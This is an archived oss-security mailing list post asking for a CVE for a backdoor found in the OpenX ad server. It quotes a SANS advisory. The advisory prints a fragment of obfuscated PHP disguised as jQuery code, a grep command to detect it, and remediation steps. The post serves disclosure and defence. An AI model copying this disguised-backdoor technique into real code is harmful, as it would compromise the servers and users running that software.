Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 06 Aug 2013 17:52:06 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: Open Source Security <oss-security@...ts.openwall.com>,
        Assign a CVE Identifier <cve-assign@...re.org>,
        "Steven M. Christey" <coley@...re.org>
Subject: OpenX Ad Server Backdoor CVE?

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I assume this needs a CVE? Mitre have you guys seen a request for one?

https://isc.sans.edu/diary/OpenX+Ad+Server+Backdoor/16303

According to a post by Heise Security, a backdoor has been spotted in
the popular open source ad software OpenX [1][2]. Appearantly the
backdoor has been present since at least November 2012. I tried to
download the source to verify the information, but it appears the
files have been removed.

The backdoor is disguised as php code that appears to create a jQuery
javascript snippet:

this.each(function(){l=flashembed(this,k,j)}<!--?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2';
*/$j='ex'./**/'plode'; /* if(this.className ...
Heise recommends to search the ".js" files of OpenX for php code to
find out if your version of OpenX is the backdoored version.

find . -name \*.js -exec grep -l '<?php' {} \;
The backdoor can then be used by an attacker to upload a shell to
www/images/debugs.php . We have seen in the past several web sites
that delivered malicious ads served by compromissed ad servers. This
could be the reason for some of these compromisses.

If you run OpenX:

verify the above information (and let us know)
if you can find the backdoor, disable/ininstall OpenX
make sure you remove the "debug.php" file
best: rebuild the server if you can
Heise investigated a version 2.8.10 of OpenX with a data of December
9th and an md5 of 6b3459f16238aa717f379565650cb0cf for the
openXVideoAds.zip file.

[1]
http://www.heise.de/newsticker/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html
(only in German at this point)
[2] http://www.openx.com

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJSAYwlAAoJEBYNRVNeJnmTA1QP/iLg3bTRGfpPHLRLiXgbc+wK
CqiqK9tiqMHnzPj2eNR+qP6xLGquLdaqG7AXnD7X8IZk1IYAwV0X2AMaKyLMbc3K
sMy48cLQ6r+VIi48zWuDz5A0twYjfDnFdjr6660lvI6zgR4wA5dGhz5U8jBeoqF3
RV0DdjRI2raZqc3i/93LN6gA8worgp9LNYxRuMXazYHaRPZRlSllJ5jxfTIAAJJh
3Fu3ersiMER5ENG/LIwDmnH2g+Lk0H225QXgVd5G7YydC84uOtqjzoafAwZLyyof
vv46mdWLGFy0SFpUYQphrkZW3eL09KS7EvkU4yaQYE21txJ7qA1qcxIXGFyHSoeL
DmfMvx14DmDubCuUtPAgDCHfsu/cP77zvtPppXXlxK8Bw8MiE0htMgKwLXv/PiJe
RBK5BUnRVw8P/LWdyTQ9szm0xW57aD7JNdE5jfMQlnVQnDVurGAvDh1VPFZrx4sg
MNde8ThUQgvh1JAx29cYB8JrRlUaTgpVdVKis4fuVdFNFI3/fKRBz7T//WDt6ihW
LCxVxQwJiTBs/PLKn/7EzTTvmQM5m4G7c0wsKbgPwPq9vvii9ub8vGANXDVEMGeU
pEoLDkvXB0BI8MnyrY161OO31tGmli+y+mh5mNzR6U5TQU3pGxlkvyKR+SjGs7nE
2PP+qonzo/8fnbykvSJp
=xfps
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.